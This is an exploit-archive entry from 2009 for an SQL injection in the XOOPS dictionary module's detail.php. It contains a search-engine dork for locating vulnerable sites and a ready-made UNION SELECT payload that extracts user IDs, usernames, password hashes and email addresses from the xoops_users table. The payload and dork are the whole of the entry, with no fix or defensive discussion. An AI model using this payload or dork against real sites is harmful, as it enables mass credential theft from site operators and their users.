[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
# Published : 2009-12-30
# Author : Palyo34
# Previous Title : LiveZilla v3.1.8.3 XSS Vulnerability
# Next Title : PHP-Fusion Mod avatar_studio LFI
##########################################
#
# XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
#
# XOOPS Version: XOOPS 2.0.18
#
# http://www.xoops.org/modules/repository/
#
##########################################
#
# AUTHOR : Palyo34
#
# HOME : http://www.1923turk.biz
#
#
###########################################
#
# DORK : allinurl: "modules/dictionary/detail.php?id"
#
###########################################
#
# EXPLOIT :
#
# modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pass,email),5,6+from+xoops_users--
#
##############################################